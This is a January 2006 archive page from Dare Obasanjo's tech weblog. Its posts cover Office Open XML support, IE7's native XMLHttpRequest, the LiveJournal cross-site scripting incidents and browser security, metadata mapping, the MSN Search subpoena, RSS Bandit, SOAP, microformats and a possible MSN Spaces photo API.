Tuesday, 24 January 2006 - Dare Obasanjo's weblog

January 24, 2006

@ 07:28 PM

WordPerfect to Support Microsoft Office Open XML Formats

Brian Jones has a blog post entitled Corel to support Microsoft Office Open XML Formats which begins

Corel has stated that they will support the new XML formats in Wordperfect once we release Office '12'. We've already seen other applications like OpenOffice and Apple's TextEdit support the XML formats that we built in Office 2003. Now as we start providing the documentation around the new formats and move through Ecma we'll see more and more people come on board and support these new formats. Here is a quote from Jason Larock of Corel talking about the formats they are looking to support in coming versions (http://labs.pcw.co.uk/2006/01/new_wordperfect_1.html):

Larock said no product could match Wordperfect's support for a wide variety of formats and Corel would include OpenXML when Office 12 is released. "We work with Microsoft now and we will continue to work with Microsoft, which owns 90 percent of the market. We would basically cut ouirselves off if you didn't support the format."

But he admitted that X3 does not support the Open Document Format (ODF), which is being proposed as a rival standard, "because no customer that we are currently dealing with as asked us to do so."

X3 does however allow the import and export of portable document format (pdf) files, something Microsoft has promised for Office 12.

I mention this article because I wanted to again stress that even our competitors will now have clear documentation that allows them to read and write our formats. That isn't really as big of a deal though as the fact that any solution provider can do this. It means that the documents can now be easily accessed 100 years from now, and start to play a more meaningful role in business processes.

Again I want to extend my kudos to Brian and the rest of the folks on the Office team who have been instrumental in the transition of the Microsoft Office file formats from proprietary binary formats to open XML formats.

Categories: Mindless Link Propagation | XML

January 24, 2006

@ 07:06 PM

Comments [0]

IE to Support Native XMLHttpRequest object

Sunava Dutta on the Internet Explorer team has written about their support for a Native XMLHTTPRequest object in IE 7. He writes

I’m excited to mention that IE7 will support a scriptable native version of XMLHTTP. This can be instantiated using the same syntax across different browsers and decouples AJAX functionality from an ActiveX enabled environment.

What is XMLHTTP?

XMLHTTP was first introduced to the world as an ActiveX control in Internet Explorer 5.0. Over time, this object has been implemented by other browsing platforms, and is the cornerstone of “AJAX” web applications. The object allows web pages to send and receive XML (or other data) via the HTTP protocol. XMLHTTP makes it possible to create responsive web applications that do not require redownloading the entire page to display new data. Popular examples of AJAX applications include the Beta version of Windows Live Local, Microsoft Outlook Web Access, and Google’s GMail.

Charting the changes: XMLHTTP in IE7 vs. IE6

In IE6 and below, XMLHTTP is implemented as an ActiveX object provided by MSXML.

In IE7, XMLHTTP is now also exposed as a native script object. Users and organizations that choose to disable ActiveX controls can still use XMLHTTP based web applications. (Note that an organization may use Group Policy or IE Options to disable the new native XMLHTTP object if desired.) As part of our continuing security improvements we now allow clients to configure and customize a security policy of their choice and simultaneously retain functionality across key AJAX scenarios.

IE7’s implementation of the XMLHTTP object is consistent with that of other browsers, simplifying the task of cross-browser compatibility. Using just a bit of script, it’s easy to build a function which works with any browser that supports XMLHTTP:

if (window.XMLHttpRequest){

          // If IE7, Mozilla, Safari, etc: Use native object
          var xmlHttp = new XMLHttpRequest()

}
else
{
if (window.ActiveXObject){

          // ...otherwise, use the ActiveX control for IE5.x and IE6
          var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
          }

}

Note that IE7 will still support the legacy ActiveX implementation of XMLHTTP alongside the new native object, so pages currently using the ActiveX control will not require rewrites.

I wonder if anyone else sees the irony in Internet Explorer copying features from Firefox which were originally copied from IE?

Categories: Web Development

January 24, 2006

@ 01:17 AM

Comments [1]

Brad Fitzpatrick on Browser Bugs and Cross Site Scripting Attacks

Brad Fitzpatrick, founder of Livejournal, has a blog post entitled Firefox bugs where he talks about some of the issues that led to the recent account hijackings on the LiveJournal service.

What I found most interesting were Brad's comments on Bug# 324253 - Do Something about the XSS issues that -moz-binding introduces in the Firefox bugzilla database. Brad wrote

Hello, this is Brad Fitzpatrick from LiveJournal.
Just to clear up any confusion: we do have a very strict HTML sanitizer. But we made the decision (years ago) to allow users to host CSS files offsite because... why not? It's just style declarations, right?
But then came along behavior, expression, -moz-binding, etc, etc...
Now CSS is full of JavaScript. Bleh.
But Internet Explorer has two huge advantages over Mozilla:
-- HttpOnly cookies (Bug 178993), which LiveJournal sponsored for Mozilla, over a year ago. Still not in tree.
-- same-origin restrictions, so an offsite behavior/binding can't mess with the calling node's DOM/Cookies/etc.
Either one of these would've saved our ass.
Now, I understand the need to innovate and add things like -moz-bindings, but please keep in mind the authors of webapps which are fighting a constant battle to improve their HTML sanitizers against new features which are added to browser.
What we'd REALLY love is some document meta tag or HTTP response header that declares the local document safe from all external scripts. HttpOnly cookies are such a beautiful idea, we'd be happy with just that, but Comment 10 is also a great proposal... being able to declare the trust level, effectively, of external resources. Then our HTML cleaner would just insert/remove the untrusted/trusted, respectively.

Cross site scripting attacks are a big problem for websites that allow users to provide HTML input. LiveJournal isn't the only major blogging site to have been hit by them, last year the 'samy is my hero' worm hit MySpace and caused some downtime for the service.

What I find interesting from Brad's post is how on the one hand having richer features in browsers is desirable (e.g. embedded Javascript in CSS) and on the other becomes a burden for developers building web apps who now have to worry that even stylesheets can contain malicious code.

The major browser vendors really need to do a better job here. I totally agree with one of the follow up comments in the bug which stated If Moz & Microsoft can agree on SSL/anti-phishing policy and an RSS icon, is consensus on scripting security policy too hard to imagine?. Collaborating on simple stuff like what orange icon to use for subscribing to feeds is nice, but areas like Web security could do with more standardization across browsers. I wonder if the WHAT WG is working on standardizing anything in this area...

Categories: Web Development

January 23, 2006

@ 10:42 PM

Comments [0]

One for the Ladies

I don't usually spam folks with links to amusing video clips that are making the rounds in email inboxes, but the video of Aussie comedy group Tripod performing their song "Make You Happy Tonight" struck a chord with me because I did what the song talks about this weekend.

The game in question was Star Wars: Knights of the Old Republic II. :)

Categories: Mindless Link Propagation

January 21, 2006

@ 01:01 PM

Comments [5]

Metadata Quality and Mapping Between Domain Languages

One part of the XML vision that has always resonated with me is that it encourages people to build custom XML formats specific to their needs but allows them to map between languages using technologies like XSLT. However XML technologies like XSLT focus on mapping one kind of syntax for another. There is another school of thought from proponents of Semantic Web technologies like RDF, OWL, and DAML+OIL, etc that higher level mapping between the semantics of languages is a better approach.

In previous posts such as RDF, The Semantic Web and Perpetual Motion Machines and More on RDF, The Semantic Web and Perpetual Motion Machines I've disagreed with the thinking of Semantic Web proponents because in the real world you have to mess with both syntactical mappings and semantic mappings. A great example of this is shown in the post entitled On the Quality of Metadata... by Stefano Mazzocchi where he writes

One thing we figured out a while ago is that merging two (or more) datasets with high quality metadata results in a new dataset with much lower quality metadata. The "measure" of this quality is just subjective and perceptual, but it's a constant thing: everytime we showed this to people that cared about the data more than the software we were writing, they could not understand why we were so excited about such a system, where clearly the data was so much poorer than what they were expecting.

We use the usual "this is just a prototype and the data mappings were done without much thinking" kind of excuse, just to calm them down, but now that I'm tasked to "do it better this time", I'm starting to feel a little weird because it might well be that we hit a general rule, one that is not a function on how much thinking you put in the data mappings or ontology crosswalks, and talking to Ben helped me understand why.

First, let's start noting that there is no practical and objective definition of metadata quality, yet there are patterns that do emerge. For example, at the most superficial level, coherence is considered a sign of good care and (here all the metadata lovers would agree) good care is what it takes for metadata to be good. Therefore, lack of coherence indicates lack of good care, which automatically resolves in bad metadata.

Note how the is nothing but a syllogism, yet, it's something that, rationally or not, comes up all the time.

This is very important. Why? Well, suppose you have two metadatasets, each of them very coherent and well polished about, say, music. The first encodes Artist names as "Beatles, The" or "Lennon, John", while the second encodes them as "The Beatles" and "John Lennon". Both datasets, independently, are very coherent: there is only one way to spell an artist/band name, but when the two are merged and the ontology crosswalk/map is done (either implicitly or explicitly), the result is that some songs will now be associated with "Beatles, The" and others with "The Beatles".

The result of merging two high quality datasets is, in general, another dataset with a higher "quantity" but a lower "quality" and, as you can see, the ontological crosswalks or mappings were done "right", where for "right" I mean that both sides of the ontological equation would have approved that "The Beatles" or "Beatles, The" are the band name that is associated with that song.

At this point, the fellow semantic web developers would say "pfff, of course you are running into trouble, you haven't used the same URI" and the fellow librarians would say "pff, of course, you haven't mapped them to a controlled vocabulary of artist names, what did you expect?".. deep inside, they are saying the same thing: you need to further link your metadata references "The Beatles" or "Beatles, The" to a common, hopefully globally unique identifier. The librarian shakes the semantic web advocate's hand, nodding vehemently and they are happy campers.

The problem Stefano has pointed out is that just being able to say that two items are semantically identical (i.e. an artist field in dataset A is the same as the 'band name' field in dataset B) doesn't mean you won't have to do some syntactic mapping as well (i.e. alter artist names of the form "ArtistName, The" to "The ArtistName") if you want an accurate mapping.

The example I tend to cull from in my personal experience is mapping between different XML syndication formats such as Atom 1.0 and RSS 2.0. Mapping between both formats isn't simply a case of saying <atom:published> owl:sameAs <pubDate> or that <atom:author> owl:sameAs <author> . In both cases, an application that understands how to process one format (e.g. an RSS 2.0 parser) would not be able to process the syntax of the equivalent elements in the other (e.g. processing RFC 3339 dates as opposed to RFC 822 dates).

Proponents of Semantic Web technologies tend to gloss over these harsh realities of mapping between vocabularies in the real world. I've seen some claims that simply using XML technologies for mapping between XML vocabularies means you will need N² transforms as opposed to needing 2N transforms if using SW technologies (Stefano mentions this in his post as has Ken Macleod in his post XML vs. RDF :: N × M vs. N + M). The explicit assumption here is that these vocabularies have similar data models and semantics which should be true otherwise a mapping wouldn't be possible. However the implicit assumption is that the syntax of each vocabulary is practically identical (e.g. same naming conventions, same date formats, etc) which this post provides a few examples where this is not the case.

What I'd be interested in seeing is whether there is a way to get some of the benefits of Semantic Web technologies while acknowledging the need for syntactical mappings as well. Perhaps some weird hybrid of OWL and XSLT? One can only dream...

Categories: Web Development | XML

January 21, 2006

@ 02:26 AM

Comments [2]

MSN Search and the DOJ Subpoena

There's been a bunch of speculation about the recent DOJ requests for logs from the major search engines. Ken Moss of the MSN Search team tells their side of the story in his post Privacy and MSN Search. He writes

There’s been quite a frenzy of speculation over the past 24 hours regarding the request by the government for some data in relation to a child online protection lawsuit. Obviously both privacy and child protection are both super important topics – so I’m glad this discussion is happening.

Some facts have been reported, but mostly I’ve seen a ton of speculation reported as facts.   I wanted to use this blog post to clarify some facts and to share with you what we are thinking here at MSN Search.

Let me start with this core principle statement: privacy of our customers is non-negotiable and something worth fighting to protect.

Now, on to the specifics.

Over the summer we were subpoenaed by the DOJ regarding a lawsuit. The subpoena requested that we produce data from our search service. We worked hard to scope the request to something that would be consistent with this principle. The applicable parties to the case received this data, and the parties agreed that the information specific to this case would remain confidential. Specifically, we produced a random sample of pages from our index and some aggregated query logs that listed queries and how often they occurred . Absolutely no personal data was involved.

With this data you:

        CAN see how frequently some query terms occurred.
       CANNOT look up an IP and see what they queried
       CANNOT look for users who queried for both “TERM A” and “TERM B”.

At MSN Search, we have strict guidelines in place to protect the privacy of our customers data, and I think you’ll agree that privacy was fully protected. We tried to strike the right balance in a very sensitive matter.

I've been surprised at how much rampant speculation from blogs has been reported in mainstream media articles as facts without people getting information directly from the source.

Categories: Current Affairs

January 20, 2006

@ 02:05 PM

Comments [15]

Indicating Updated Items in RSS Bandit

A user of RSS Bandit recently forwarded me a discussion on the atom-syntax mailing list which criticized some of our design decisions. In an email in the thread entitled Reader 'updated' semantics Tim Bray wrote

On Jan 10, 2006, at 9:07 AM, James M Snell wrote:

In RSS there is definite confusion on what constitutes an update. In Atom it is very clear. If <updated> changes, the item has been updated. No controversy at all.
Indeed. There's a word for behavior of RssBandit and Sage: WRONG. Atom provides a 100% unambiguous way to say "this is the same entry, but it's been changed and the publisher thinks the change is significant." Software that chooses to hide this fact from users is broken - arguably dangerous to those who depend on receiving timely and accurate information - and should not be used. -Tim

People who write technology specifications often have good intentions but unfortunately they often aren't implementers of the specs they are creating. This leads to disconnects between reality and what is actually in the spec.

The problems with updates to blog posts is straightforward. There are minor updates which don't warrant signalling to the user such as typos being fixed (e.g. 12 of 13 miner survive mine collapse changed to 12 of 13 miners survive mine collapse) and those which do because they add significant changes to the story (e.g. 12 of 13 miners survive mine collapse changed to 12 of 13 miners ~~survive~~ killed in mine collapse).

James Snell is right that it is ambiguous how to detect this in RSS but not in Atom due to the existence of the atom:updated element. The Atom spec states

The "atom:updated" element is a Date construct indicating the most recent instant in time when an entry or feed was modified in a way the publisher considers significant. Therefore, not all modifications necessarily result in a changed atom:updated value.

On paper it sounds like this solves the problem. On paper, it does. However for this to work correctly, weblog software now need to include an option such as 'Indicate that this change is significant' when users edit posts. Without such an option, the software cannot correctly support the atom:updated element. Since I haven't found any mainstream tools that support this functionality, I haven't bothered to implement a feature which is likely to annoy users more often than be useful since many people edit their blog posts in ways that don't warrant alerting the user.

However I do plan to add features for indicating when posts have changed in unambiguous scenarios such as when new comments are added to a blog post of interest to the user. The question I have for our users is how would you like this indicated in the RSS Bandit user interface?

Categories: RSS Bandit

January 20, 2006

@ 02:27 AM

Comments [6]

My Favorite SOAP Anti-Pattern

Richard Searle has a blog post entitled The SOAP retrieval anti-pattern where he writes

I have seen systems that use SOAP based Web Services only to implement data retrievals.

The concept is to provide a standardized mechanism for external systems to retrieve data from some master system that controls the data of interest. This has value in that it enforces a decoupling from the master systems data model. It can also be easy to manage and control than the alternative to allowing the consuming systems to directly query the master systems database tables.
...
The selection of a SOAP interface over a RESTful interface is also questionable. The SOAP interface has a few (generally one) parameters and then returns a large object. Such an interface with a single parameter has a trivial representation as a GET. A multi-parameter call can also be trivial mapped if the parameters define a conceptual heirarchy (eg the ids of a company and one of its employees).

Such a GET interface avoids all the complexities of SOAP, WSDL, etc. AJAX and XForm clients can trivially and directly use the interface. A browser can use XSLT to provide a human readable representation.

Performance can easily be boosted by interposing a web cache. Such optimization would probably occur essentially automatically since any significant site would already have caching. Such caching can be further enhanced by using the HTTP header timestamps to compare against the updated timestamps in the master system tables.

I agree 100%, web services that use SOAP solely for data retrieval are usually a sign that the designers of the service need to get a clue when it comes to building distributed applications for the Web.

PS: I realize that my employer has been guilty of this in the past. In fact, we've been known to do this at MSN as well although at least we also provided RESTful interfaces to the service in that instance. ;)

Categories: XML Web Services

January 18, 2006

@ 12:39 PM

Comments [8]

Microformats vs. XML: Pros and Cons

Since writing my post Microformats vs. XML: Was the XML Vision Wrong?, I've come across some more food for thought in the appropriateness of using microformats over XML formats. The real-world test case I use when thinking about choosing microformats over XML is whether instead of having an HTML web page for my blog and an Atom/RSS feed, I should instead have a single HTML page with <div class="rss:item"> or <h3 class="atom:title"> embedded in it. To me this seems like a gross hack but I've seen lots of people comment on how this seems like a great idea to them. Given that I hadn't encountered universal disdain for this idea, I decided to explore further and look for technical arguments for and against both approaches.

I found quite a few discussions on the how and why microformats came about in articles such as The Microformats Primer in the Digital Web Magazine and Introduction to Microformats in the Microformats wiki. However I hadn't seen many in-depth technical arguments of why they were better than XML formats until recently.

In a comment in response to my Microformats vs. XML: Was the XML Vision Wrong?, Mark Pilgrim wrote

Before microformats had a home page, a blog, a wiki, a charismatic leader, and a cool name, I was against using XHTML for syndication for a number of reasons.

http://diveintomark.org/archives/2002/11/26/syndication_is_not_publication

I had several basic arguments:

1. XHTML-based syndication required well-formed semantic XHTML with a particular structure, and was therefore doomed to failure. My experience in the last 3+ years with both feed parsing and microformats parsing has convinced me that this was incredibly naive on my part. Microformats may be *easier* to accomplish with semantic XHTML (just like accessibility is easier in many ways if you're using XHTML + CSS), but you can be embed structured data in really awful existing HTML markup, without migrating to "semantic XHTML" at all.

2. Bandwidth. Feeds are generally smaller than their corresponding HTML pages (even full content feeds), because they don't contain any of the extra fluff that people put on web pages (headers, footers, blogrolls, etc.) And feeds only change when actual content changes, whereas web pages can change for any number of valid reasons that don't involve changes to the content a feed consumer would be interested in. This is still valid, and I don't see it going away anytime soon.

3. The full-vs-partial content debate. Lots of people who publish full content on web pages (including their home page) want to publish only partial content in feeds. The rise of spam blogs that automatedly steal content from full-content feeds and republish them (with ads) has only intensified this debate.

4. Edge cases. Hand-crafted feed summaries. Dates in Latin. Feed-only content. I think these can be handled by microformats or successfully ignored. For example, machine-readable dates can be encoded in the title attribute of the human-readable date. Hand-crafted summaries can be published on web pages and marked up appropriately. Feed-only content can just be ignored; few people do it and it goes against one of the core microformats principles that I now agree with: if it's not human-readable in a browser, it's worthless or will become worthless (out of sync) over time.

I tend to agree with Mark's conclusions. The main issue with using microformats for syndication instead of RSS/Atom feeds is wasted bandwidth since web pages tend to contain more stuff than feeds and change more often.

Norm Walsh raises a few other good points on the trade offs being made when choosing microformats over XML in his post Supporting Microformats where he writes

Microformats (and architectural forms, and all the other names under which this technique has been invented) take this one step further by standardizing some of these attribute values and possibly even some combination of element types and attribute values in one or more content models.

This technique has some stellar advantages: it's relatively easy to explain and the fallback is natural and obvious, new code can be written to use this “extra” information without any change being required to existing applications, they just ignore it.

Despite how compelling those advantages are, there are some pretty serious drawbacks associated with microformats as well. Adding hCalendar support to my itineraries page reinforced several of them.

They're not very flexible. While I was able to add hCalendar to the overall itinerary page, I can't add it to the individual pages because they don't use the right markup. I'm not using <div> and <span> to markup the individual appointments, so I can't add hCalendar to them.

I don't think they'll scale very well. Microformats rely on the existing extensibility point, the role or class attribute. As such, they consume that extensibility point, leaving me without one for any other use I may have.

They're devilishly hard to validate. DTDs and W3C XML Schema are right out the door for validating microformats. Of course, Schematron (and other rule-based validation languages) can do it, but most of us are used to using grammar-based validation on a daily basis and we're likely to forget the extra step of running Schematron validation.

It's interesting that RELAX NG can almost, but not quite, do it. RELAX NG has no difficulty distinguishing between two patterns based on an attribute value, but you can't use those two patterns in an interleave pattern. So the general case, where you want to say that the content of one of these special elements is “an <abbr> with class="dtstart" interleaved with an <abbr> with class="dtend" interleaved with…”, you're out of luck. If you can limit the content to something that doesn't require interleaving, you can use RELAX NG for your particular application, but most of the microformats I've seen use interleaving in the general case.

Is validation really important? Well, I have well over a decade of experience with markup languages at this point and I was reminded just last week that I can't be relied upon to write a simple HTML document without markup errors if I don't validate it. If they can't be validated, they will often be incorrect.

The complexity of validating microformats isn't something I'd considered in my original investigation but is a valid point. As a developer of an RSS aggregator, I've found the existence of the Feed Validator to be an immense help in tracking down issues. Not having the luxury of being able to validate feeds would make building an aggregator a lot harder and a lot less fun.

I'll continue to pay attention to this discussion but for now microformats will remain in the "gross hack" bucket for me.

Categories: XML

January 18, 2006

@ 12:03 PM

Comments [9]

A Flickr-like API for MSN Spaces?

Once people find out that they can use tools like ecto, Blogjet or W.Bloggar to manage their blog on MSN Spaces via the MetaWeblog API, they often ask me why we don't have something equivalent to the Flickr API so they can do the same for the photos they have in their space.

My questions for folks out there is whether this is something you'd like to see? Do you want to be able to create, edit and delete photos and photo albums in your Space using desktop tools? If so, what kind of tools do you have in mind?

If you are a developer, what kind of API would you like to see? Should it use XML-RPC, SOAP or REST? Do you want a web service or a DLL?

Let me know what you think.

Categories: Windows Live | XML Web Services

Dare Obasanjo's weblog

"You can buy cars but you can't buy respect in the hood" - Curtis Jackson

Navigation for Tuesday, 24 January 2006 - Dare Obasanjo's weblog